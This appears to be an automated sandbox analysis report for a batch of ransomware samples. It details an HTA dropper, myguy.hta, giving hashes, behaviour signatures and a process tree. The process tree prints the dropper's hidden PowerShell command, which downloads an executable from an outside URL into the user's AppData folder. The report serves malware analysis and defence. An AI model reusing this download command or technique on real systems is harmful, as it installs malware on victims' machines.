Overview

Score summary for the samples in this submission (score out of 10, all run on windows7-x64):
- Static analysis: 10
- cerber.exe: 3
- cryptowall.exe: 10
- jigsaw.exe: 9
- Locky.exe: 10
- 131.exe: 10
- Matsnu-MBR...3 .exe: 1
- 027cc450ef...d9.dll: 7
- 027cc450ef...ju.dll: 10
- myguy.hta: 10
- svchost.exe: 10

Resubmissions (7), entries shown on the page:
- 05-08-2024 22:23, task 240805-2ba2rathle, score 10
- 27-04-2024 00:38, task 240427-ay3xhafc53, score 10
- 20-04-2024 05:28, task 240420-f6ht7aad5w, score 10

Analysis
- max time kernel: 119s
- max time network: 119s
- platform: windows7_x64
- resource: win7-20240221-en
- resource tags: arch:x64, arch:x86, image:win7-20240221-en, locale:en-us, os:windows7-x64, system
- submitted: 27-04-2024 00:38
Tasks

- static1 (static task)
- behavioral1: sample cerber.exe, resource win7-20240221-en
- behavioral2: sample cryptowall.exe, resource win7-20240221-en
- behavioral3: sample jigsaw.exe, resource win7-20240419-en
- behavioral4: sample Locky.exe, resource win7-20240220-en
- behavioral5: sample 131.exe, resource win7-20231129-en
- behavioral6: sample Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe, resource win7-20240221-en
- behavioral7: sample 027cc450ef5f8c5f653329641ec1fed9.dll, resource win7-20240215-en
- behavioral8: sample 027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745_98STJd8lju.dll, resource win7-20240220-en
- behavioral9: sample myguy.hta, resource win7-20240221-en
- behavioral10: sample svchost.exe, resource win7-20240221-en
General

- Target: myguy.hta
- Size: 13KB
- MD5: 0487382a4daf8eb9660f1c67e30f8b25
- SHA1: 736752744122a0b5ee4b95ddad634dd225dc0f73
- SHA256: ee29b9c01318a1e23836b949942db14d4811246fdae2f41df9f0dcd922c63bc6
- SHA512: e1e7d81d54efd526139ea8ac792ed2035c8e70f040319c0b65f723431d31077c7a6927553890c99151f2354f51c4020ed94e0e2e5d56386c2fc4828e95869106
- SSDEEP: 192:ScIsmNvaHz65bP/U/njs3NH0Z0UvDVE6Az6XVHBycT6iLMUpJ2seCYHlfeb:SPXTmnjs3BU9A27BNLMUTb
Malware Config

- Extracted URL: http://french-cooking.com/myguy.exe
Signatures

- Blocklisted process makes network request (1 IoC)
  Processes:
    flow 5, pid 2060, process powershell.exe

- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).

- Modifies Internet Explorer settings (signature name taken from the mshta.exe entry in the process tree below; the heading itself was lost in extraction)
  Processes:
    mshta.exe: key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main

- Suspicious behavior: EnumeratesProcesses (1 IoC)
  Processes:
    pid 2060, process powershell.exe

- Suspicious use of AdjustPrivilegeToken (1 IoC)
  Processes:
    pid 2060, process powershell.exe, description: Token: SeDebugPrivilege

- Suspicious use of WriteProcessMemory (4 IoCs)
  Processes (pid, process, target pid, target process):
    PID 2276 mshta.exe wrote to memory of 2060 powershell.exe
    PID 2276 mshta.exe wrote to memory of 2060 powershell.exe
    PID 2276 mshta.exe wrote to memory of 2060 powershell.exe
    PID 2276 mshta.exe wrote to memory of 2060 powershell.exe
Processes

1. C:\Windows\SysWOW64\mshta.exe (PID 2276)
   Command line: C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\myguy.hta"
   - Modifies Internet Explorer settings
   - Suspicious use of WriteProcessMemory

   2. C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 2060, child of PID 2276)
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile('http://french-cooking.com/myguy.exe', 'C:\Users\Admin\AppData\Roaming\7694.exe');
      - Blocklisted process makes network request
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken